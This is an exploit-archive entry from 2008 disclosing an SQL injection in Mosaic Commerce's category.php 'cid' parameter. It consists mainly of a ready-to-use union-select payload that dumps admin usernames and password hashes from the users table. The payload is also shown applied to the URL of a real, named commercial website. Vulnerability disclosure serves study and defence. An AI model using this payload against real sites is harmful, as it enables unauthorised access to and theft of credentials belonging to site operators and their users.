[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mosaic Commerce (category.php cid) SQL Injection Vulnerability
# Published : 2008-10-16
# Author : Ali Abbasi
# Previous Title : CafeEngine Multiple Remote SQL Injection Vulnerabilities
# Next Title : Mic_blog 0.0.3 (SQL Injection/Privilege Escalation) Remote Exploit
Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
{SQL BUG}
/mosaic-path/category.php?cid=[SQL]
Exploit For Get Admin Username And Password Hash:
category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
Example:
http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
# www.Syue.com [2008-10-16]